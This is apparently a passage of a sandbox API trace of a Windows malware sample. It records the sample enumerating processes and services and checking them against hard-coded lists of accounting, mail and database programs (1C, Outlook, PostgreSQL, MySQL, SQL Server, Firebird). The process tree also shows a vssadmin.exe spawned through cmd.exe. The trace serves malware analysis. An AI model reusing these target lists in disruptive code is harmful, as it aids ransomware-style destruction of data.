lstrlenW (lpString="smss.exe") returned 8 [0052.413] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0052.413] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0052.413] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0052.413] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0052.413] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0052.413] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0052.413] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0052.413] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0052.414] lstrlenW (lpString="csrss.exe") returned 9 [0052.414] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0052.414] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0052.414] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0052.414] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0052.414] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0052.414] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0052.414] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0052.414] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0052.415] lstrlenW (lpString="wininit.exe") returned 11 [0052.415] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0052.415] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0052.415] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0052.415] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0052.416] lstrlenW (lpString="csrss.exe") returned 9 [0052.416] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0052.417] lstrlenW (lpString="winlogon.exe") returned 12 [0052.417] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0052.417] lstrlenW (lpString="services.exe") returned 12 [0052.417] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0052.418] lstrlenW (lpString="lsass.exe") returned 9 [0052.418] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0052.419] lstrlenW (lpString="lsm.exe") returned 7 [0052.419] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.419] lstrlenW (lpString="svchost.exe") returned 11 [0052.419] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.420] lstrlenW (lpString="svchost.exe") returned 11 [0052.420] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.421] lstrlenW (lpString="svchost.exe") returned 11 [0052.421] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.422] lstrlenW (lpString="svchost.exe") returned 11 [0052.422] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.422] lstrlenW (lpString="svchost.exe") returned 11 [0052.422] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0052.423] lstrlenW (lpString="audiodg.exe") returned 11 [0052.423] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.430] lstrlenW (lpString="svchost.exe") returned 11 [0052.430] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.431] lstrlenW (lpString="svchost.exe") returned 11 [0052.431] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0052.432] lstrlenW (lpString="dwm.exe") returned 7 [0052.432] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0052.432] lstrlenW (lpString="explorer.exe") returned 12 [0052.432] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0052.433] lstrlenW (lpString="spoolsv.exe") returned 11 [0052.433] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0052.434] lstrlenW (lpString="taskhost.exe") returned 12 [0052.434] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.435] lstrlenW (lpString="svchost.exe") returned 11 [0052.435] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0052.435] lstrlenW (lpString="taskeng.exe") returned 11 [0052.435] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0052.436] lstrlenW (lpString="taskhost.exe") returned 12 [0052.436] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="called.exe")) returned 1 [0052.437] lstrlenW (lpString="called.exe") returned 10 [0052.437] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pal_bermuda_xhtml.exe")) returned 1 [0052.438] lstrlenW (lpString="pal_bermuda_xhtml.exe") returned 21 [0052.438] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="analyst.exe")) returned 1 [0052.438] lstrlenW (lpString="analyst.exe") returned 11 [0052.438] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="resolved_encourages_statewide.exe")) returned 1 [0052.488] lstrlenW (lpString="resolved_encourages_statewide.exe") returned 33 [0052.488] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wages.exe")) returned 1 [0052.489] lstrlenW (lpString="wages.exe") returned 9 [0052.489] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rand.exe")) returned 1 [0052.489] lstrlenW (lpString="rand.exe") returned 8 [0052.489] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vacations considered astrology.exe")) returned 1 [0052.490] lstrlenW (lpString="vacations considered astrology.exe") returned 34 [0052.490] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cottage.exe")) returned 1 [0052.491] lstrlenW (lpString="cottage.exe") returned 11 [0052.491] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pairs_spec.exe")) returned 1 [0052.491] lstrlenW (lpString="pairs_spec.exe") returned 14 [0052.491] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arthur cyber bid.exe")) returned 1 [0052.492] lstrlenW (lpString="arthur cyber bid.exe") returned 20 [0052.492] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="observationshairy.exe")) returned 1 [0052.493] lstrlenW (lpString="observationshairy.exe") returned 21 [0052.493] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="portland-workforce-patient.exe")) returned 1 [0052.494] lstrlenW (lpString="portland-workforce-patient.exe") returned 30 [0052.494] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spectrum.exe")) returned 1 [0052.494] lstrlenW (lpString="spectrum.exe") returned 12 [0052.494] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dies.exe")) returned 1 [0052.495] lstrlenW (lpString="dies.exe") returned 8 [0052.495] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configured.exe")) returned 1 [0052.496] lstrlenW (lpString="configured.exe") returned 14 [0052.496] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rememberkatrina.exe")) returned 1 [0052.496] lstrlenW (lpString="rememberkatrina.exe") returned 19 [0052.496] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x488, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fast.exe")) returned 1 [0052.497] lstrlenW (lpString="fast.exe") returned 8 [0052.497] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="berkeley-challenges-binding.exe")) returned 1 [0052.498] lstrlenW (lpString="berkeley-challenges-binding.exe") returned 31 [0052.498] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="review.exe")) returned 1 [0052.498] lstrlenW (lpString="review.exe") returned 10 [0052.498] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="historybinding.exe")) returned 1 [0052.499] lstrlenW (lpString="historybinding.exe") returned 18 [0052.499] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pk task surge.exe")) returned 1 [0052.500] lstrlenW (lpString="pk task surge.exe") returned 17 [0052.500] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0052.500] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0052.500] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="mobsync.exe")) returned 1 [0052.501] lstrlenW (lpString="mobsync.exe") returned 11 [0052.501] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ivttvf.exe")) returned 1 [0052.502] lstrlenW (lpString="ivttvf.exe") returned 10 [0052.502] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa90, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0052.503] lstrlenW (lpString="cmd.exe") returned 7 [0052.503] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0052.504] lstrlenW (lpString="conhost.exe") returned 11 [0052.504] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xa9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0052.504] lstrlenW (lpString="vssadmin.exe") returned 12 [0052.504] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0052.505] lstrlenW (lpString="VSSVC.exe") returned 9 [0052.505] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.506] lstrlenW (lpString="svchost.exe") returned 11 [0052.506] Process32NextW (in: hSnapshot=0x214, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0052.506] CloseHandle (hObject=0x214) returned 1 [0052.506] Sleep (dwMilliseconds=0x1f4) [0053.182] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x6645b8 [0053.183] EnumServicesStatusExW (in: hSCManager=0x6645b8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 0 [0053.183] GetLastError () returned 0xea [0053.183] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x12c6) returned 0x3f740a8 [0053.183] EnumServicesStatusExW (in: hSCManager=0x6645b8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3f740a8, cbBufSize=0x12c6, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3f740a8, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 1 [0053.186] CloseServiceHandle (hSCObject=0x6645b8) returned 1 [0053.186] lstrlenW (lpString="Appinfo") returned 7 [0053.186] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0053.186] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0053.186] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0053.187] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0053.187] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0053.187] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0053.187] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0053.187] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0053.187] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0053.187] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0053.187] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0053.187] lstrlenW (lpString="AudioSrv") returned 8 [0053.187] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0053.187] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0053.187] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0053.187] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0053.187] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0053.187] lstrlenW (lpString="BFE") returned 3 [0053.187] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0053.187] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0053.187] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0053.187] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0053.187] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0053.187] lstrlenW (lpString="CryptSvc") returned 8 [0053.187] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0053.187] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0053.187] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0053.187] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0053.187] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0053.187] lstrlenW (lpString="CscService") returned 10 [0053.187] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0053.187] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0053.187] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0053.187] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0053.187] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0053.187] lstrlenW (lpString="DcomLaunch") returned 10 [0053.187] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0053.187] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0053.188] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0053.188] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0053.188] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0053.188] lstrlenW (lpString="Dhcp") returned 4 [0053.188] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0053.188] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0053.188] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0053.188] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0053.188] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0053.188] lstrlenW (lpString="Dnscache") returned 8 [0053.188] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0053.188] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0053.188] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0053.188] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0053.188] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0053.188] lstrlenW (lpString="DPS") returned 3 [0053.188] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0053.188] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0053.188] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0053.189] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0053.189] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0053.189] lstrlenW (lpString="eventlog") returned 8 [0053.189] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 